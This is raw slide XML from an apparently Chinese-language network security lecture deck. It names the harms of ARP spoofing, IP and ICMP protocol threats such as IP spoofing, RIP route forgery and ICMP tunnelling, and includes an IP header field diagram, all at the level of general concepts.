          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络异常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体表现为：掉线、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>冲突等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据窃取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体表现为：个人隐私泄漏（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>聊天记录、邮件等）、账号被盗用（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账号、银行账号等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据篡改</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体表现为：访问的网页被添加了恶意内容，俗称“挂马”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 非法控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体表现为：网络速度、网络访问行为（例如某些网页打不开、某些网络应用程序用不了）受第三者非法控制。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Arp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗的危害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184324" name="图片 7" descr="110813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2492896"/>
            <a:ext cx="57150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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27097919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box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络层协议的安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3607448948"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pul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normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议的安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不能为数据提供完整性、机密性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由消息协议攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RIP Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）：利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议无认证机制的缺陷，在网络上发布假的路由信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址不进行认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以设置“源路由”选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源路由欺骗攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分片包”的威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分片扫描和拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议的安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>广播响应包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用隧道技术封装成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包来建立隐藏通道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>穿越防火墙</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络层协议的安全威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{45CA1F53-DDA1-4EF0-A9E1-D01E00B7FF11}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4282111555"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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F849B1-26BB-4F50-A8FC-E932EBB2F421}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>135</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28674" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="1917700"/>
            <a:ext cx="936625"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版本号</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5" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="2438400"/>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6" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="2916238"/>
            <a:ext cx="2016125" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70787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7 h 434362"/>
              <a:gd name="T12" fmla="*/ 6 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353924 h 434362"/>
              <a:gd name="T14" fmla="*/ 6 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403978 h 434362"/>
              <a:gd name="T16" fmla="*/ 6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生存期</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7" name="Freeform 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="3394075"/>
            <a:ext cx="8291513" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70788 h 434362"/>
              <a:gd name="T2" fmla="*/ 21214 w 8291264"/>
              <a:gd name="T3" fmla="*/ 20733 h 434362"/>
              <a:gd name="T4" fmla="*/ 72415 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 8221319 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 8272540 w 8291264"/>
              <a:gd name="T9" fmla="*/ 20733 h 434362"/>
              <a:gd name="T10" fmla="*/ 8293745 w 8291264"/>
              <a:gd name="T11" fmla="*/ 70788 h 434362"/>
              <a:gd name="T12" fmla="*/ 8293745 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353932 h 434362"/>
              <a:gd name="T14" fmla="*/ 8272540 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403988 h 434362"/>
              <a:gd name="T16" fmla="*/ 8221319 w 8291264"/>
              <a:gd name="T17" fmla="*/ 424719 h 434362"/>
              <a:gd name="T18" fmla="*/ 72415 w 8291264"/>
              <a:gd name="T19" fmla="*/ 424719 h 434362"/>
              <a:gd name="T20" fmla="*/ 21214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C729"/>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源</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8" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="3870325"/>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B873"/>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目的</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9" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="4362450"/>
            <a:ext cx="6192838" cy="434975"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 73422 h 434362"/>
              <a:gd name="T2" fmla="*/ 1146 w 8291264"/>
              <a:gd name="T3" fmla="*/ 21504 h 434362"/>
              <a:gd name="T4" fmla="*/ 3912 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 444122 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 446888 w 8291264"/>
              <a:gd name="T9" fmla="*/ 21504 h 434362"/>
              <a:gd name="T10" fmla="*/ 448034 w 8291264"/>
              <a:gd name="T11" fmla="*/ 73422 h 434362"/>
              <a:gd name="T12" fmla="*/ 448034 w 8291264"/>
              <a:gd name="T13" fmla="*/ 367108 h 434362"/>
              <a:gd name="T14" fmla="*/ 446888 w 8291264"/>
              <a:gd name="T15" fmla="*/ 419027 h 434362"/>
              <a:gd name="T16" fmla="*/ 444122 w 8291264"/>
              <a:gd name="T17" fmla="*/ 440531 h 434362"/>
              <a:gd name="T18" fmla="*/ 3912 w 8291264"/>
              <a:gd name="T19" fmla="*/ 440531 h 434362"/>
              <a:gd name="T20" fmla="*/ 1146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选项</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0" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="4826000"/>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9639E"/>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数据</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78858" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>IP协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28682" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6732588" y="4362450"/>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填充位</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3" name="Freeform 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="2924175"/>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报头校验和</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4" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5651500" y="2420938"/>
            <a:ext cx="3097213" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70787 h 434362"/>
              <a:gd name="T2" fmla="*/ 1 w 8291264"/>
              <a:gd name="T3" fmla="*/ 20733 h 434362"/>
              <a:gd name="T4" fmla="*/ 4 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 435 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 437 w 8291264"/>
              <a:gd name="T9" fmla="*/ 20733 h 434362"/>
              <a:gd name="T10" fmla="*/ 439 w 8291264"/>
              <a:gd name="T11" fmla="*/ 70787 h 434362"/>
              <a:gd name="T12" fmla="*/ 439 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353924 h 434362"/>
              <a:gd name="T14" fmla="*/ 437 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403978 h 434362"/>
              <a:gd name="T16" fmla="*/ 435 w 8291264"/>
              <a:gd name="T17" fmla="*/ 424710 h 434362"/>
              <a:gd name="T18" fmla="*/ 4 w 8291264"/>
              <a:gd name="T19" fmla="*/ 424710 h 434362"/>
              <a:gd name="T20" fmla="*/ 1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分段移位标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(13)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28685" name="Freeform 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="1917700"/>
            <a:ext cx="4105275" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70788 h 434362"/>
              <a:gd name="T2" fmla="*/ 19 w 8291264"/>
              <a:gd name="T3" fmla="*/ 20733 h 434362"/>
              <a:gd name="T4" fmla="*/ 64 w 8291264"/>
              <a:gd name="T5" fmla="*/ 0 h 434362"/>
              <a:gd name="T6" fmla="*/ 7278 w 8291264"/>
              <a:gd name="T7" fmla="*/ 0 h 434362"/>
              <a:gd name="T8" fmla="*/ 7324 w 8291264"/>
              <a:gd name="T9" fmla="*/ 20733 h 434362"/>
              <a:gd name="T10" fmla="*/ 7342 w 8291264"/>
              <a:gd name="T11" fmla="*/ 70788 h 434362"/>
              <a:gd name="T12" fmla="*/ 7342 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353932 h 434362"/>
              <a:gd name="T14" fmla="*/ 7324 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403988 h 434362"/>
              <a:gd name="T16" fmla="*/ 7278 w 8291264"/>
              <a:gd name="T17" fmla="*/ 424719 h 434362"/>
              <a:gd name="T18" fmla="*/ 64 w 8291264"/>
              <a:gd name="T19" fmla="*/ 424719 h 434362"/>
              <a:gd name="T20" fmla="*/ 19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总长度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6" name="Freeform 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4643438" y="2420938"/>
            <a:ext cx="936625" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70787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7 h 434362"/>
              <a:gd name="T12" fmla="*/ 0 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353924 h 434362"/>
              <a:gd name="T14" fmla="*/ 0 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403978 h 434362"/>
              <a:gd name="T16" fmla="*/ 0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标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28687" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="2924175"/>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协议标识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8" name="Freeform 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="1917700"/>
            <a:ext cx="2016125" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70788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8 h 434362"/>
              <a:gd name="T12" fmla="*/ 6 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353932 h 434362"/>
              <a:gd name="T14" fmla="*/ 6 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403988 h 434362"/>
              <a:gd name="T16" fmla="*/ 6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服务类型</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9" name="Freeform 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="1917700"/>
            <a:ext cx="1008063"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包头长度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90" name="TextBox 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="1557338"/>
            <a:ext cx="331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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28691" name="TextBox 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4167188"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15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28692" name="TextBox 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8343900"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31</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1540665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8680"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28680"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
